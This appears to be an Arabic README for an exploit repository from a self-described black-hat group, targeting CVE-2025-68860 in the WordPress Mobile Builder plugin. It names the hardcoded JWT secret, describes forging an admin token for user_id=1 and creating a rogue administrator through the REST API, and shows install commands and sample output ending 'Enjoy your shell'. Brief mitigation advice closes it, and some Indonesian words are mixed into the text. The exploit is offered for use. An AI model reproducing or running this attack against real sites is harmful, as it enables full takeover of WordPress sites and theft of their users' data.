
سكربت استغلال لثغرة CVE-2025-68860 يستهدف إضافة WordPress Mobile Builder. يولّد رموز JWT مزوّفة باستخدام سر مضمّن في الكود للمصادقة كمدير وإنشاء حسابات مدير جديدة عبر REST API.
إضافة WordPress Mobile Builder الإصدار 1.4.2 وما دون تحتوي على ثغرة كسر المصادقة (Broken Authentication) التي تسمح للمهاجم بإنشاء رمز JWT صالح باستخدام السر الافتراضي "example_key" والمصادقة بصفته مسؤولًا (user_id=1). وبهذا الرمز، يمكن للمهاجم إنشاء حساب مسؤول جديد والاستيلاء على الموقع.
CVE: CVE-2025-68860
السبب: استخدام مفتاح سري مضمّن "example_key" لـ JWT دون تحقق كافٍ.
موقع الثغرة: في إضافة Mobile Builder، الملف الذي يعالج مصادقة JWT (مثل class-jwt-auth.php) يستخدم الثابت JWT_SECRET بالقيمة الافتراضية 'example_key'. لا يمكن تغيير هذا السر من خلال الإعدادات، لذلك يمكن للمهاجم إنشاء رمز لأي user_id.
التأثير: يمكن للمهاجم إنشاء رمز لـ user_id=1 (مسؤول)، والوصول إلى نقطة نهاية REST API، وإنشاء مستخدم جديد بدور مسؤول.
CVSS: عالية (النتيجة 8.8) - ناقل شبكة، ولا يتطلب تفاعل المستخدم.
ينشئ السكربت رمز JWT بحمولة تحتوي على user_id: 1 (admin) dan secret "example_key".
يُستخدم الرمز للوصول إلى /wp-json/wp/v2/users/ للتحقق من وصول المسؤول.
إذا نجح ذلك، يرسل السكربت طلب POST إلى /wp-json/wp/v2/users لإنشاء مستخدم جديد باسم المستخدم dedsec1337 وكلمة المرور admin والبريد الإلكتروني [email protected] ودور administrator.
يعرض الإخراج بيانات الاعتماد واستجابة API.
Python 3.6+
Library: requests, PyJWT, colorama
Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!
==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email : [email protected]
===================================================
Full API response:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "[email protected]",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...
يمكن للمهاجم إنشاء حساب مسؤول جديد، والوصول إلى جميع ميزات WordPress، وتثبيت إضافات ضارة، وتعديل المحتوى، وسرقة بيانات المستخدمين، أو استخدام الموقع لهجمات أخرى.
يمكن استغلال هذه الثغرة عن بُعد دون مصادقة مسبقة.
التأثير: اختراق كامل لموقع WordPress.
قم بتحديث إضافة Mobile Builder فورًا إلى أحدث إصدار (>=1.4.3).
إذا لم يتوفر تحديث، فعطّل الإضافة مؤقتًا.
تحقق من وجود أي مستخدمين مشبوهين على موقعك.
استخدم جدار حماية تطبيقات الويب (WAF) لمنع الطلبات المشبوهة إلى نقاط نهاية REST API.
كإجراء مؤقت، غيّر المفتاح السري في كود الإضافة (إن أمكن) وقيّد الوصول إلى REST API.